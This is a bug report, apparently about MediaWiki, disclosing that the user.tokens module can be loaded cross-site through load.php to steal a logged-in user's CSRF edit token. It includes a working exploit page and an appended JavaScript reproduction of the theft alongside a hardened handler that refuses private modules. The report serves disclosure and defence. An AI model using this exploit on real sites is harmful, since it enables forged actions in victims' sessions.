It's possible to load the user.tokens module cross-site, from any page a logged-in user visits, stealing the tokens used for CSRF protection:
<script>
// Fake mw object: implement() just runs the module body, and tokens.set()
// receives the real tokens from the victim's logged-in session.
mw = {
    loader: { implement: function(name, func) { var $ = {}; func($); } },
    user: { tokens: { set: function(hashmap) {
        var token = hashmap.editToken;
        alert("your https://en.wikipedia.org session's edit token is " + token);
    } } }
};
</script>
<script src="https://en.wikipedia.org/w/load.php?modules=user.tokens"></script>
This module, and any others that expose private data, should probably not be allowed to be requested via load.php...
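The following is an added example, not code from this report or from MediaWiki. It reproduces the attack above offline (the victim's browser sends its Wikipedia cookies with the cross-site <script src>, and because the load.php response is plain JavaScript, it runs inside the attacker's page with the attacker's `mw` object) and then shows the fix the report suggests: a load.php-style handler that refuses to serve any module flagged as carrying private data. The response body, the module registry, the `group: 'private'` flag and the token value are all constructed for this example.

```javascript
// Constructed stand-in for what load.php?modules=user.tokens returns to a
// logged-in user: a script that hands the session's tokens to mw.user.tokens.set.
// The token values are made up for this example.
const USER_TOKENS_RESPONSE = `mw.loader.implement("user.tokens", function ($) {
  mw.user.tokens.set({ editToken: "0123456789abcdef", watchToken: "fedcba9876543210" });
}, {}, {});`;

// Attacker side. Mirrors the exploit page above: a fake `mw` whose implement()
// simply runs the module body, so the module's tokens.set() call lands in
// attacker code. Returns whatever tokens the response handed over.
function stealTokens(responseScript) {
  const stolen = {};
  const fakeMw = {
    loader: {
      implement(name, script) { script({} /* placeholder for jQuery */); },
    },
    user: {
      tokens: {
        set(hashmap) { Object.assign(stolen, hashmap); },
      },
    },
  };
  // Stand-in for the browser executing the included script: it runs in a scope
  // where `mw` resolves to the attacker's object, not MediaWiki's.
  new Function('mw', responseScript)(fakeMw);
  return stolen;
}

// Server side. Minimal stand-in for the module registry behind load.php;
// `group: 'private'` is an assumed flag marking modules that embed per-user secrets.
const REGISTRY = {
  'user.tokens':  { group: 'private', body: USER_TOKENS_RESPONSE },
  'jquery':       { group: null,      body: '/* jquery */' },
  'mediawiki.util': { group: null,    body: '/* mediawiki.util */' },
};

// Handler implementing the suggestion above: any requested module that is
// private is refused outright, so a cross-site include has nothing to read.
// Unknown modules are refused too rather than silently skipped.
function serveModules(query) {
  const requested = query.split('|').filter(Boolean);
  const refused = requested.filter(n => REGISTRY[n] && REGISTRY[n].group === 'private');
  if (refused.length) {
    return { status: 403, body: 'private module(s) not servable via load.php: ' + refused.join(',') };
  }
  const unknown = requested.filter(n => !REGISTRY[n]);
  if (unknown.length) {
    return { status: 404, body: 'unknown module(s): ' + unknown.join(',') };
  }
  return { status: 200, body: requested.map(n => REGISTRY[n].body).join('\n') };
}

// Demonstration: the leak with the vulnerable behaviour, then the hardened handler.
console.log('stolen:', stealTokens(USER_TOKENS_RESPONSE));
console.log('hardened:', serveModules('jquery|user.tokens'));
```

Refusing the module at load.php is only part of the fix: the page still needs its tokens, so they have to reach the browser through a channel a third-party site cannot include as a script, for example inline in the HTML response itself. The key property is that a secret must never be served in a same-origin-only-by-cookie resource that parses as JavaScript.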
Version: unspecified
Severity: normal